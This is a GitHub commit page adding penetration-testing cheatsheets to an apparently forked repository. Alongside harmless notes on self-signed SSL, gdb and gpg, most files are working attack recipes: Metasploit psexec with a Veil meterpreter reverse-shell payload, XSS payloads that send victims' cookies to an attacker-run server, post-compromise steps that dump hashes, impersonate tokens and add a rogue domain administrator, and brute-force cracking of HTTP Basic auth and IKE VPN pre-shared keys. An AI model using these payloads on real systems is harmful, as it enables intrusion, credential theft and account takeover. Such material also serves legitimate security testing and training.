forked from dipsec/Cheatsheets-1
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Added more cheatsheets
- Loading branch information
Showing
19 changed files
with
953 additions
and
15 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,14 @@ | ||
1. Generate executable using Veil. | ||
|
||
2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp) | ||
|
||
msf > use exploit/windows/smb/psexec | ||
msf exploit(psexec) > set RHOST 192.168.0.2 | ||
RHOST => 192.168.0.2 | ||
msf exploit(psexec) > set SMBUser user | ||
SMBUser => user | ||
msf exploit(psexec) > set SMBPass pass | ||
SMBPass => pass | ||
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe | ||
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe | ||
msf exploit(psexec) > exploit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,42 @@ | ||
# Enabling Self signed certificates on local website | ||
|
||
1. Install OpenSSL | ||
|
||
2. Run the following command to generate the self signed SSL certificates: | ||
|
||
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout mysitename.key -out mysitename.crt | ||
|
||
3. You will be prompted to enter your organizational information and a common name. The common name should be the fully qualified domain name for the site you are securing (www.mydomain.com). You can leave the email address, challenge password, and optional company name blank. When the command is finished running, it will create two files: a mysitename.key file and a mysitename.crt self signed certificate file valid for 365 days. | ||
|
||
4. Install the self signed certificate: | ||
|
||
Make a backup copy of /etc/apache2/sites-enabled/000-default and open the original in a text editor. | ||
|
||
Add the lines in bold below. <VirtualHost 192.168.0.1:443> | ||
DocumentRoot /var/www/website | ||
ServerName www.domain.com | ||
SSLEngine on | ||
SSLCertificateFile /etc/ssl/certs/primary.crt | ||
SSLCertificateKeyFile /etc/ssl/certs/private.key | ||
SSLCertificateChainFile /etc/ssl/certs/intermediate.crt | ||
</VirtualHost> | ||
|
||
Change the names of the files and paths to match your certificate files. Save the changes and exit the text editor. | ||
|
||
5. Enable mod_ssl under apache using the following commands: | ||
|
||
a2enmod ssl | ||
/etc/init.d/apache2 restart | ||
|
||
## Add ServerName localhost | ||
|
||
to /etc/apache2/apache2.conf | ||
|
||
|
||
More information: | ||
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html | ||
http://www.akadia.com/services/ssh_test_certificate.html | ||
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html | ||
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server | ||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,12 @@ | ||
[+] Cookie Stealing: | ||
|
||
[-] Start Web Service | ||
|
||
python -m SimpleHTTPServer 80 | ||
|
||
[-] Use one of the following XSS payloads: | ||
|
||
<script>document.location="http://192.168.0.60/?c="+document.cookie;</script> | ||
<script>new Image().src="http://192.168.0.60/index.php?c="+document.cookie;</script> | ||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
[+] After compromising a Windows machine: | ||
|
||
[>] List the domain administrators: | ||
From Shell - net group "Domain Admins" /domain | ||
|
||
[>] Dump the hashes (Metasploit) | ||
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE | ||
|
||
[>] Find the admins (Metasploit) | ||
spool /tmp/enumdomainusers.txt | ||
msf > use auxiliary/scanner/smb/smb_enumusers_domain | ||
msf > set smbuser Administrator | ||
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 | ||
msf > set rhosts 10.10.10.0/24 | ||
msf > set threads 8 | ||
msf > run | ||
|
||
msf> spool off | ||
|
||
[>] Compromise Admin's box | ||
meterpreter > load incognito | ||
meterpreter > list_tokens -u | ||
meterpreter > impersonate_token MYDOM\\adaministrator | ||
meterpreter > getuid | ||
meterpreter > shell | ||
|
||
C:\> whoami | ||
mydom\adaministrator | ||
C:\> net user hacker /add /domain | ||
C:\> net group "Domain Admins" hacker /add /domain |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,58 @@ | ||
set disassembly-flavor intel | ||
|
||
$ cat ~/.bash_aliases | grep gdb | ||
alias gdb='gdb -quiet' | ||
|
||
Running gdb | ||
------------------ | ||
$ gdb - run, then use file command to load object | ||
$ gdb -quiet - supress copyright information | ||
$ gdb object - normal debug | ||
$ gdb object core - analyze core dump | ||
$ gdb object pid - attach to running process | ||
|
||
General commands | ||
------------------ | ||
set args - set program arguments | ||
show args - show program arguments | ||
run - run the program | ||
run < file - run with input from file | ||
set follow-exec-mode new/sam - set debugger response to an exec call | ||
set write - set write into executables | ||
set write off - unset write int oexecutables | ||
continue - continue running until break | ||
finish - execute until current stack frame ends | ||
source FILE - read commands from script file | ||
shell [cmd] - run cmd in a shell | ||
display /5i $eip - display expression everytime execution stops | ||
undisplay <expr #> - undisplay expression number | ||
info functions - list all the functions | ||
info variables - list all the variables | ||
info registers - list most common registers | ||
info all-registers - list all registers | ||
info display - print the list of displayed expressions | ||
backtrace - print backtrace of all stack frames | ||
where - same as backtrace | ||
set disassembly-flavor intel - set disassembly style to intel/att | ||
define hook-[cmd] - actions to execute before command | ||
define hooopost-[cmd] - actions to execute after command | ||
define hook-stop - actions to execute when execution stops | ||
|
||
Breakpoints | ||
------------------ | ||
info breakpoints - list all breakpoints | ||
break [func] - break function name | ||
break *[addr] - break at address | ||
delete [bnum] - delete breakpoint bnum | ||
break if [cond] - break if condition | ||
ignore [bnum] [count] - ignore breakpoint bnum count times | ||
condition [bnum] $eax == 0x22 - add condition for breakpoint 1 | ||
condition [bnum] - delete condition for breakpoint 1 | ||
|
||
Watchpoints | ||
------------------ | ||
info watchpoints - list all the watchpoint | ||
watch variable==value - break when variable equals .. | ||
watch $eax == 0x0000ffaa - break when register equals .. | ||
rwatch *[addr] - break on read memory location | ||
awatch *[addr] - break on read/write memory location |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,14 @@ | ||
Encrypt | ||
------------ | ||
sudo gpg -e ~/Desktop/file.doc | ||
|
||
This will prompt you to type in the persons name (public key) to encrypt with. | ||
|
||
Decrypt | ||
----------- | ||
sudo gpg -d ~/Desktop/file.doc.pgp > ~/Desktop/file.doc | ||
|
||
|
||
Import other users' public keys by using: | ||
|
||
sudo gpg --import <key> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,40 @@ | ||
[>] HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite | ||
|
||
http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/ | ||
|
||
Burp Suite against HTTP Basic authentication | ||
|
||
To implement the attack you need to capture one authentication request with Burp Proxy and send it to Burp Intruder. | ||
|
||
Mark only the Base64 encoded string and click Add button to put the markers around it. | ||
|
||
Dictionary attack | ||
|
||
For the dictionary attack I’m using custom iterator intruder option. It allows you to generate your own custom payload string consisting from several substrings. For every substring you could specify separator which is basically e suffix. The Intruder calls those substrings “positions”. | ||
Following this logic in position 1 we would like to load an username followed by separator semicolumn and then load password for position 2. | ||
Go to Payload tab and select Custom iterator option from Payload type dropdown box. | ||
Burp Suite Custom Iterator | ||
Select position 1 from the Position dropdown box and load your usernames list in List items for position 1 listbox. Put semicolumn in the Separator for position 1 text box. | ||
Position 1 list and separator option | ||
Select position 2 from the Position dropdown box and load your passwords list in List items for position 2 listbox. | ||
Position 2 | ||
After you’ve set your two positions you need to tell the Intruder to encode the payload string using Base64 encoding. Go to Payload processing sections and click Add button. Select Payload encoding option and then Base64. | ||
PayloadProcessin_AddRule_Encode | ||
PayloadProcessingEncode | ||
By default Burp Intruder URL encodes the payload. Base64 strings often contain = symbol. That is why it is a good idea to exclude it from the list of URL characters for encoding. | ||
That’s it. You can start the Intruder attack. | ||
|
||
Bruteforce attack | ||
|
||
The method I’m using for the bruteforce attack is targeting only one username per Intruder attack. | ||
Select Brute forcer from the Payload type dropdown and then set the length of the password and the characterset you would like the Intruder to use while constructing the password strings. | ||
Burp Intruder Brute forcer | ||
In order to specify the username you would like to brute-force you need to set Payload processing rule. Add new rule with Add prefix type and fill up the username followed by semi-column. | ||
Burp Intruder Add Prefix | ||
Add another rule to encode the payload using Base64. And finally remove = from the list of symbols subject of URL encoding. | ||
Burp Sutei Bruteforce Attack Settings | ||
Done! You can start the Intruder attack! | ||
|
||
[>] Automated Security Analyser for ASP.NET Websites | ||
|
||
https://asafaweb.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,60 @@ | ||
Aggressive Mode VPN -- IKE-Scan, PSK-Crack | ||
|
||
In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK. | ||
|
||
This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure. | ||
|
||
It looks like this: | ||
|
||
$ ike-scan 192.168.207.134 | ||
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) | ||
|
||
192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797) | ||
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec). | ||
0 returned handshake; 1 returned notify | ||
|
||
---------------------------------------------------------------------------------------------------------------------------------- | ||
|
||
$ sudo ike-scan -A 192.168.207.134 | ||
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/) | ||
|
||
192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes) | ||
|
||
---------------------------------------------------------------------------------------------------------------------------------- | ||
|
||
To save with some output: | ||
|
||
$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key | ||
|
||
Once you have you psk file to crack you're stuck with two options psk-crack and cain | ||
|
||
---------------------------------------------------------------------------------------------------------------------------------- | ||
|
||
Brute force: | ||
|
||
$psk-crack -b 5 192-168-207-134key | ||
Running in brute-force cracking mode | ||
Brute force with 36 chars up to length 5 will take up to 60466176 iterations | ||
|
||
no match found for MD5 hash 5c178d[SNIP] | ||
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec) | ||
|
||
Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset= | ||
|
||
$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key | ||
Running in brute-force cracking modde | ||
Brute force with 63 chars up to length 5 will take up to 992436543 iterations | ||
|
||
---------------------------------------------------------------------------------------------------------------------------------- | ||
|
||
Dictionary attack: | ||
|
||
$psk-crack -d /path/to/dictionary 192-168-207-134key | ||
Running in dictionary cracking mode | ||
|
||
no match found for MD5 hash 5c178d[SNIP] | ||
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec) | ||
|
||
---------------------------------------------------------------------------------------------------------------------------------- | ||
|
||
References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html |
Oops, something went wrong.